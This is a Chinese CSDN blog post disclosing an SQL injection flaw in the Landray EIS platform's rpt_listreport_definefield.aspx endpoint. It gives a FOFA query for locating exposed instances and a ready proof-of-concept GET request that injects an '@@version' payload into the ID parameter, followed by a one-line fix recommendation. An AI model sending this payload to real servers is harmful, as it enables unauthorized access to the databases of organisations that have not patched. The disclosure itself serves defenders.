蓝凌EIS智慧协同平台rpt_listreport_definefield.aspx接口存在SQL注入漏洞

最新推荐文章于 2024-08-30 11:32:34 发布
最新推荐文章于 2024-08-30 11:32:34 发布
阅读量224 收藏
点赞数 2
文章标签: sql 数据库 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_36334672/article/details/136448687
版权
本文报道了蓝凌EIS智慧协同平台rpt_listreport_definefield.aspx接口存在的SQL注入漏洞,提供了漏洞编号、影响范围、检测方法(POC)以及推荐的修复建议,强调了及时更新至最新版本以保障系统安全。
摘要由CSDN通过智能技术生成

蓝凌EIS智慧协同平台rpt_listreport_definefield.aspx接口SQL注入漏洞

1.漏洞介绍

蓝凌EIS智慧协同平台rpt_listreport_definefield.aspx接口存在SQL注入漏洞

2.漏洞编号
CVECNVDCNNVD
---

3.影响范围
名称版本号
-

4.检索特征

FOFA:icon_hash=“953405444”||app=“Landray-OA系统”
在这里插入图片描述

5.POC
GET /SM/rpt_listreport_definefield.aspx?ID=2%20and%201=@@version--+ HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Connection: Keep-Alive
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Upgrade-Insecure-Requests: 1

6.修复建议

更新到最新版本

7.参考信息
qq_36334672
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
蓝凌EIS智慧协同平台 SQL注入漏洞复现
0xSec
12-15 911
由于蓝凌EIS智慧协同平台UniformEntry.asp接口处未对用户输入的SQL语句进行过滤或验证导致出现SQL注入漏洞,未经身份验证的攻击者可以利用此漏洞获取数据库敏感信息。
蓝凌EIS智慧协同平台 frm_form_upload.aspx 文件上传漏洞复现
0xSec
01-12 880
蓝凌EIS智慧协同平台frm_form_upload.aspx接口存在任意文件上传漏洞,未经过身份认证的攻击者可通过构造压缩文件上传恶意后门文件,远程命令执行,获取服务器权限。
漏洞复现】蓝凌EIS api.aspx 任意文件上传漏洞
凝聚力安全团队
06-19 295
蓝凌EIS api.aspx 接口存在任意文件上传漏洞,攻击者通过漏洞可以上传任意文件至服务器,导致服务器失陷。蓝凌EIS,是一款专为成长型企业打造的沟通、协同、社交的一动办公平台,涵盖了OA、沟通、客户。人事以及知识库等管理需求,最终目的是打造简单而高效的工作方式,真正做到企业管理的信息化。
蓝凌EIS智慧协同平台saveImg接口存在任意文件上传漏洞
holyxp的博客
10-30 1125
蓝凌智慧协同平台eis集合了非常丰富的模块,满足组织企业在知识、协同、项目管理系统建设等需求。
蓝凌-EIS-uploadpic-任意文件上传-0day未公开漏洞复现
weixin_43167326的博客
01-26 375
蓝凌EIS是一款全面的企业管理软件,以知识管理为核心,致力于提升组织产能。其特点在于高度自定义、易用性和灵活扩展性。通过自定义功能和流程,蓝凌EIS能够满足企业的个性化需求。同时,简单的界面和操作方式使得员工能够快速上手使用。蓝凌EIS还注重知识管理,提供知识模板和知识库等功能,方便员工进行知识分享和学习。此外,蓝凌EIS还提供丰富的。
蓝凌EIS智慧协同平台 rpt_listreport_definefield.aspx SQL注入漏洞复现
0xSec
03-04 479
由于蓝凌EIS智慧协同平台 rpt_listreport_definefield.aspx接口处未对用户输入的SQL语句进行过滤或验证导致出现SQL注入漏洞,未经身份验证的攻击者可以利用此漏洞获取数据库敏感信息。
漏洞复现】蓝凌EIS 智慧协同平台 rpt_listreport_definefield.aspx SQL注入漏洞
qq_67810151的博客
03-04 539
蓝凌EIS智慧协同平台 rpt_listreport_definefield.aspx 接口存在SQL注入漏洞。未授权的攻击者可以通过该漏洞获取数据库敏感信息。
漏洞复现】蓝凌EIS智慧协同平台-frm-form-list-main-sql注入
知黑而守白
01-15 115
蓝凌EIS智慧协同平台是个自动化办公OA,具有多端同步、无缝协作,提供移动端(蓝凌KK、阿里钉钉、微信企业号)、桌面端、网页端多端应用统一入口、跨屏操作、信息同步知识云服务集成、学习与创新应用、企业2.0应用、跨系统整合等优点,并且在诸多公司也采用该平台蓝凌EIS智慧协同平台 frm_form_list_main 接口存在SQL注入漏洞。攻击者可以通过构造恶意的SQL语句,成功注入并执行恶意数据库操作,可能导致敏感信息泄露、数据库被篡改或其他严重后果。
蓝凌EIS智慧协同平台 多处SQL注入漏洞复现
0xSec
01-12 596
​由于蓝凌EIS智慧协同平台 doc_fileedit_word.aspx、frm_form_list_main.aspx、frm_button_func.aspx、fl_define_flow_chart_show.aspx等接口处未对用户输入的SQL语句进行过滤或验证导致出现SQL注入漏洞,未经身份验证的攻击者可以利用此漏洞获取数据库敏感信息。
蓝凌EIS智慧协同平台frm_form_upload.aspx接口存在任意文件上传漏洞
nnn2188185的博客
01-18 195
蓝凌EIS智慧协同平台frm_form_upload.aspx接口存在任意文件上传漏洞
漏洞披露-金慧-综合管理信息系统-SQL
无问社区的博客
08-27 501
金慧数据资产管理平台是一款企业级数据资产管理软件,其基于先进的技术架构,具备操作简单、部署灵活、快速响应等特点。由于金慧-综合管理信息系统 LoginBegin.aspx(登录接口处)没有对外部输入的SQL语句进行严格的校验和过滤,直接带入数据库执行,导致未经身份验证的远程攻击者可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。
SQL统计行数的语句
曹昆的技术博客
08-27 368
SQL 中,你可以使用 COUNT() 函数来统计查询结果的行数。这个函数可以用在不同的上下文中,具体取决于你想要统计的内容。
SQL 注入新视角:堆查询、JSON 与头部 XFF 注入剖析及防范
2301_77160226的博客
08-27 2129
SQL 注入攻击的世界中,除了一些常见的注入方式外,还有堆查询注入、JSON 注入以及头部 XFF 注入等较为特殊的攻击手段。这些攻击方式利用不同的场景和漏洞,对数据库安全构成严重威胁。本文将详细介绍这三种 SQL 注入攻击方式的原理和特点。
推荐一篇 学习SQL 的文章
m0_66975650的博客
08-26 500
学习 java,当然避不开数据库的知识,个人认为好学好理解的一篇文章,推荐给大家
PostgreSQL如何设置主键自增(序列、SERIAL)
西京刀客
08-26 1205
在使用Mysql时,创建表结构时可以通过关键字auto_increment来指定主键是否自增。但在Postgresql数据库中,虽然可以实现字段的自增,但从本质上来说却并不支持Mysql那样的自增。
【解决】sql中包含问号(?),导致mybatis解析错误
最新发布
奔跑的菜鸟的Run博客
08-30 275
被替换了 而不是 我们参数 ,参数的位置还是空的。下面给出两种我测试都可以的方案,但是个人比较推荐第二种方案。这个sql在我们的sql连接器中执行是完全没问题的,但是在mybatis中使用这个sql的时候。也就是在问号的前面多加一个问号,这样就能解决了。会被mybatis当作占位符 替换成参数。给解析成变量 导致sql查询失败。解析参数会把 sql语句中的。sql语句中本身包含。使用pg数据库内置函数。
SQL基础】【leetcode】SQL50题
FQY__的博客
08-26 1092
里的,就可以得到只光顾商店的客人。进行分组,这是因为如果不这样使用,聚合函数返回的结果是一个值,需要用分组进行分开。可以把原始的表分为start表和end表,再进行联表查询,这样就可以计算时间戳的插值,进而使用。)的情况查询出的内容是笛卡儿积,而WHERE的限制条件则是对其的筛选。或者我写的这种隐式链接。是一个用于计算两个日期之间差异的函数,它返回两个日期之间的差异,以天数为单位。这一题的本质就是将两个表合并,得到所需的信息,因此不需要额外的操作了。注意,联表查询得到的结果是一张临时表,而最基础的。
2024最新的最全面基本sqlmap使用命令
为了低调的博客
08-27 977
bash复制代码通过本地代理(例如Burp Suite)进行扫描。bash复制代码每次请求使用随机的User-Agent头进行扫描。bash复制代码指定id和user两个参数进行测试。bash复制代码。
蓝凌EIS4.0:打造智慧协同工作平台
"蓝凌EIS4.0是一款智慧协同平台,旨在通过高效的知识管理和协同工作,提升企业的运营效率和员工的工作智慧。该白皮书详细介绍了EIS4.0的设计思想、技术架构、产品特点、四大核心应用、扩展功能以及贴心服务,并通过...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值